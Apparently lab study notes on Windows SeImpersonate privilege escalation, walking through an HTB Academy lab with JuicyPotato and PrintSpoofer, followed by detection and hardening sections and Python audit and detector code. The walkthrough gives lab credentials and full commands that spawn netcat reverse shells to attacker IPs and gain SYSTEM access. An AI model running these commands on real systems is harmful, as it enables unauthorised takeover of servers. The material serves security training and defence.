SeImpersonate & SeAssignPrimaryToken
Overview
SeImpersonate and SeAssignPrimaryToken are powerful privileges that allow escalation from service accounts to SYSTEM level access. These privileges enable processes to impersonate other users' security tokens, commonly exploited through "Potato-style" attacks.
Token Impersonation Fundamentals
Access Token Concepts
Process tokens contain security context information
Token impersonation allows assuming another user's identity
SeImpersonatePrivilege required to utilize stolen tokens
Memory-based attacks target token locations in process memory
Key Privileges
SeImpersonatePrivilege # Impersonate client after authentication
SeAssignPrimaryTokenPrivilege # Replace process level token
Common Service Account Context:
IIS application pools
SQL Server service accounts
Jenkins execution contexts
MSSQL xp_cmdshell execution
Potato Attack Family
Attack Mechanism
Service account holds SeImpersonatePrivilege but has no SYSTEM-level access of its own
Potato attack tricks a SYSTEM process into connecting to an attacker-controlled process
Token handover occurs during connection authentication
Token abuse elevates privileges to NT AUTHORITY\SYSTEM
JuicyPotato - Legacy Systems
Prerequisites
SeImpersonate OR SeAssignPrimaryToken privilege
Windows Server 2016 and earlier (before build 1809)
DCOM/NTLM reflection capabilities
Basic Usage
# Basic privilege escalation
JuicyPotato.exe -l [listening_port] -p c:\windows\system32\cmd.exe -a "/c [command]" -t *
# Reverse shell example
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
Parameters:
-l - COM server listening port
-p - Program to launch
-a - Arguments passed to program
-t - CreateProcess call type (* = try both)
PrintSpoofer - Modern Systems
Advantages
Windows Server 2019 and Windows 10 build 1809+ compatible
Print Spooler service abuse mechanism
Multiple execution modes available
Usage Examples
# Interactive SYSTEM shell in current console
PrintSpoofer.exe -i -c cmd
# Desktop SYSTEM process (RDP sessions)
PrintSpoofer.exe -d -c cmd
# Reverse shell execution
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
RoguePotato - Alternative Approach
OXID resolver abuse technique
Named pipe impersonation method
Server 2019 and Windows 10 compatible
Practical Exploitation Scenario
SQL Server Service Account Compromise
Initial Access via MSSQL
# Connect with mssqlclient.py
mssqlclient.py sql_dev@10.129.43.30 -windows-auth
# Enable xp_cmdshell
SQL> enable_xp_cmdshell
# Verify service account context
SQL> xp_cmdshell whoami
# Output: nt service\mssql$sqlexpress01
Privilege Assessment
SQL> xp_cmdshell whoami /priv
# Key privileges to identify:
SeAssignPrimaryTokenPrivilege # Replace process level token - Disabled
SeImpersonatePrivilege # Impersonate client after authentication - Enabled
SeManageVolumePrivilege # Perform volume maintenance tasks - Enabled
JuicyPotato Exploitation
# Upload JuicyPotato.exe and nc.exe to target
# Set up listener: nc -lnvp 8443
# Execute privilege escalation
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
# Expected output:
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
PrintSpoofer Alternative
# Modern Windows systems
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
# Expected output:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Verification
# Confirm SYSTEM access
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
WINLPE-SRV01
Tool Comparison

| Tool | Target systems | Mechanism | Reliability |
|---|---|---|---|
| JuicyPotato | Server 2016 and earlier | DCOM/NTLM reflection | High |
| PrintSpoofer | Server 2019+, Win10 1809+ | Print Spooler service | High |
| RoguePotato | Server 2019+, Win10+ | OXID resolver | Medium |
| SweetPotato | Universal | Multiple methods | High |
HTB Academy Lab Solution
Lab Environment
Target:
10.129.43.43 (ACADEMY-WINLPE-SRV01)
Credentials:
sql_dev:Str0ng_P@ssw0rd!
Objective: Escalate privileges and retrieve flag
Detailed Step-by-Step Solution
1. Initial Connection with MSSQL
┌─[us-academy-1]─[10.10.14.143]─[htb-ac330204@pwnbox-base]─[~]
└──╼ [★]$ mssqlclient.py sql_dev@10.129.43.43 -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password: Str0ng_P@ssw0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 1: Changed database context to 'master'.
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162)
[!] Press help for extra shell commands
SQL>
2. Enable xp_cmdshell for Command Execution
SQL> enable_xp_cmdshell
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
3. Enumerate Privileges - Key Step!
SQL> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
NULL
Critical Finding: SeImpersonatePrivilege is Enabled - this allows privilege escalation!
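The privilege check in step 3 (and the Privilege Assessment section earlier) is where the risk becomes visible, so here is an added audit helper, written for this page and not part of the original material or of HTB Academy's lab, that parses `whoami /priv` output as it comes back through xp_cmdshell (NULL rows and headers included) and reports which token privileges the account holds. The sample output below is constructed to mirror step 3, and the function names are assumptions made here.

```python
import re
from typing import Dict, List, NamedTuple

# The two token privileges this page is about.
TOKEN_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

class Privilege(NamedTuple):
    name: str
    description: str
    state: str  # "Enabled" or "Disabled"

# Constructed sample, shaped like the xp_cmdshell output in step 3 above.
SAMPLE_OUTPUT = """\
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
NULL
"""

# One table row: privilege name, free-text description, then the state.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(text: str) -> Dict[str, Privilege]:
    """Parse the table printed by `whoami /priv`, ignoring the NULL rows and
    header lines that xp_cmdshell wraps around it."""
    privs: Dict[str, Privilege] = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = Privilege(*m.groups())
    return privs

def token_privilege_findings(privs: Dict[str, Privilege]) -> List[str]:
    """Token-abuse privileges the account holds. A Disabled privilege is still
    in the token and the process can enable it, so presence is what matters."""
    return [f"{name} held ({privs[name].state})"
            for name in sorted(TOKEN_PRIVILEGES & privs.keys())]

if __name__ == "__main__":
    for finding in token_privilege_findings(parse_whoami_priv(SAMPLE_OUTPUT)):
        print("[!]", finding)
```

Run against the step 3 output it reports both SeAssignPrimaryTokenPrivilege (Disabled) and SeImpersonatePrivilege (Enabled); for an auditor, either finding on a service account is the condition to remediate, not just the Enabled one.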
4. Set Up Reverse Shell Listener (New Terminal)
┌─[us-academy-1]─[10.10.14.143]─[htb-ac330204@pwnbox-base]─[~]
└──╼ [★]$ nc -lvnp 8443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443
5. Execute PrintSpoofer Privilege Escalation
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "C:\tools\nc.exe 10.10.14.143 8443 -e cmd.exe"
output
--------------------------------------------------------------------------------
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
6. Receive SYSTEM Shell
┌─[us-academy-1]─[10.10.14.143]─[htb-ac330204@pwnbox-base]─[~]
└──╼ [★]$ nc -lvnp 8443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443
Ncat: Connection from 10.129.43.43.
Ncat: Connection from 10.129.43.43:49699.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
7. Verify SYSTEM Access & Retrieve Flag
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
WINLPE-SRV01
# Retrieve the flag
C:\Windows\system32>type C:\Users\Administrator\Desktop\SeImpersonate\flag.txt
[FLAG_CONTENT_HERE]
Alternative Methods
Using JuicyPotato (for older systems)
# If PrintSpoofer fails, try JuicyPotato
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.143 8443 -e cmd.exe" -t *
Key Success Indicators
SeImpersonatePrivilege Enabled - Confirmed in step 3
PrintSpoofer Success Message - [+] Found privilege: SeImpersonatePrivilege
SYSTEM Shell Received - whoami returns nt authority\system
Flag Retrieved - Successfully read from Administrator desktop
Troubleshooting Common Issues
If PrintSpoofer Fails:
# Try alternative tools based on OS version:
# Windows Server 2016 and below: JuicyPotato
# Windows 10/Server 2019+: PrintSpoofer, RoguePotato
If Connection Issues:
# Verify firewall rules and network connectivity
# Try different ports: 443, 80, 8080, 9001
If Tools Not Present:
# Upload tools first (may require web shell or other upload method)
# Or use PowerShell-based alternatives
Detection Indicators
Process Behavior
# Unusual SYSTEM processes spawned from service accounts
# COM server listening on high ports
# Named pipe creation by non-privileged accounts
# Print Spooler service interactions
Event Logs
Event ID 4648 - Explicit credential logon (token impersonation)
Event ID 4672 - Special privileges assigned to logon
Event ID 4624 - Account logon events
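To make the process-behavior and event-log indicators above, and the Detection Rules listed further below, concrete: this is an added Python detector, written for this page and not part of the original material, that runs two of those rules (known tool names, and a service account creating a process whose token is SYSTEM) over constructed process-creation records modelled on the Creator Subject / Target Subject fields of Security event 4688. The record field names, file paths and sample events are assumptions made here.

```python
from dataclasses import dataclass
from typing import List, Tuple
import ntpath

# Tool names taken from this page; matched on the image basename.
KNOWN_TOOLS = {"juicypotato.exe", "printspoofer.exe", "roguepotato.exe", "sweetpotato.exe"}
SERVICE_ACCOUNT_PREFIXES = ("nt service\\", "iis apppool\\")
SYSTEM = "nt authority\\system"

@dataclass
class ProcessEvent:
    """Simplified Security event 4688 (field names are constructed here)."""
    creator_user: str    # Creator Subject: account that called CreateProcess*
    target_user: str     # Target Subject: account the new process runs as
    new_process: str     # New Process Name
    parent_process: str  # Creator Process Name

def is_service_account(user: str) -> bool:
    return user.lower().startswith(SERVICE_ACCOUNT_PREFIXES)

def detect(ev: ProcessEvent) -> List[str]:
    """Return the names of the rules that fire for one event."""
    hits = []
    if ntpath.basename(ev.new_process).lower() in KNOWN_TOOLS:
        hits.append("known_potato_tool")
    # The CreateProcessWithTokenW / CreateProcessAsUser step of these attacks
    # shows up as a service account creating a process whose token is SYSTEM.
    if is_service_account(ev.creator_user) and ev.target_user.lower() == SYSTEM:
        hits.append("service_account_spawned_system")
    return hits

def scan(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Index and rule hits for every event that fired at least one rule."""
    results = [(i, detect(ev)) for i, ev in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]

# Constructed sample chain: xp_cmdshell -> PrintSpoofer -> SYSTEM nc.exe,
# plus one benign SYSTEM-to-SYSTEM service start. Paths are illustrative.
SVC = r"NT SERVICE\MSSQL$SQLEXPRESS01"
SAMPLE_EVENTS = [
    ProcessEvent(SVC, SVC, r"C:\Windows\System32\cmd.exe", r"C:\MSSQL\Binn\sqlservr.exe"),
    ProcessEvent(SVC, SVC, r"C:\tools\PrintSpoofer.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(SVC, r"NT AUTHORITY\SYSTEM", r"C:\tools\nc.exe", r"C:\tools\PrintSpoofer.exe"),
    ProcessEvent(r"NT AUTHORITY\SYSTEM", r"NT AUTHORITY\SYSTEM",
                 r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe"),
]
if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(f"[!] event {idx}: {', '.join(rules)} -> {SAMPLE_EVENTS[idx].new_process}")
```

The tool-name rule is trivially evaded by renaming the binary; the token-mismatch rule is the durable one, because the service account must create a SYSTEM-token process for the escalation to succeed at all.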
Defense Strategies
Privilege Hardening
# Remove SeImpersonate from service accounts
# Implement least-privilege principles
# Regular privilege audits
Detection Rules
# Monitor for:
- JuicyPotato.exe execution
- PrintSpoofer.exe execution
- Unusual token impersonation events
- SYSTEM processes spawned by service accounts
SeImpersonate Exploitation Checklist
Prerequisites
Execution Steps
Post-Exploitation
Key Takeaways
SeImpersonate privilege is extremely powerful for privilege escalation
Service accounts commonly have this privilege enabled
Tool selection depends on target OS version and build
Multiple techniques available - always have backups ready
Common attack vector - expect this in most web applications
High success rate when prerequisites are met
SeImpersonate privilege escalation remains one of the most reliable Windows privilege escalation techniques, particularly in service account compromise scenarios.